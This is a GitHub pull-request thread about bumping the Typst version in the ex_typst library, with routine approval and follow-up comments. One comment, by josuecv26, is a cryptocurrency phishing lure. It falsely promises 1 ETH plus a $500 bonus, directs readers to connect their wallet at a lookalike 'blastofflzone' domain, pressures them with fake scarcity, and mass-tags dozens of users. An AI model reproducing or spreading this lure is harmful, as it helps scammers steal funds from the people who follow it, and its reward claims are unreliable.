### PR TITLE
feat: bump typst version

### PR DESCRIPTION
**Pull request by muse254**
Workflow run: https://github.com/muse254/ex_typst/actions/runs/6958603362/job/18933958267

### CODE REVIEW

**Comment by muse254** [comment]
@leobessa Ok to review

**Review by leobessa — APPROVED** [review]
LGTM

**Comment by muse254** [comment]
Based on this (https://github.com/leobessa/ex_typst/pull/2/commits/1dfeb770944fd549b39251dc22190635e0610431) I realize I left an `unimplemented!()` laying around.
I now have an idea on how to test the Rust bit of the changes. I'll follow-up with a PR to patch this and any other issues I might have missed.

Sorry if it broke on your end 😆

**Comment by josuecv26** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
patrix252, @kujus, @ch1c0t, @vai, @openoms, @jacobburrell, @j0sh21, @iWarpBTC, @BorjaRuizReverter, @rolandschellhorn, @PhilippWa, @rafsan2010, @Guikingone, @JoelBondurant, @tpoomlmly, @sitbon, @schlunsen, @johnnyknoxville1337, @meehow, @derekross, @vvvijaya, @Kixunil, @edcheyjr, @Gorik2, @hewigovens, @NathanielHart44, @Alexemidio, @xbol0, @tuggyman, @leerentveld, @relaibattosai, @islandHODL, @imnolte, @subaddiction, @chef4brains, @SamSamskies, @y-martinez, @3-juno, @StijnBTC, @devmasme, @titusz, @ohsevin, @RossBlakeMSc, @gnzng, @bradparisi, @azorcode, @sunlei, @pepakriz, @quillie, @kaloudis

**Pull request merged**
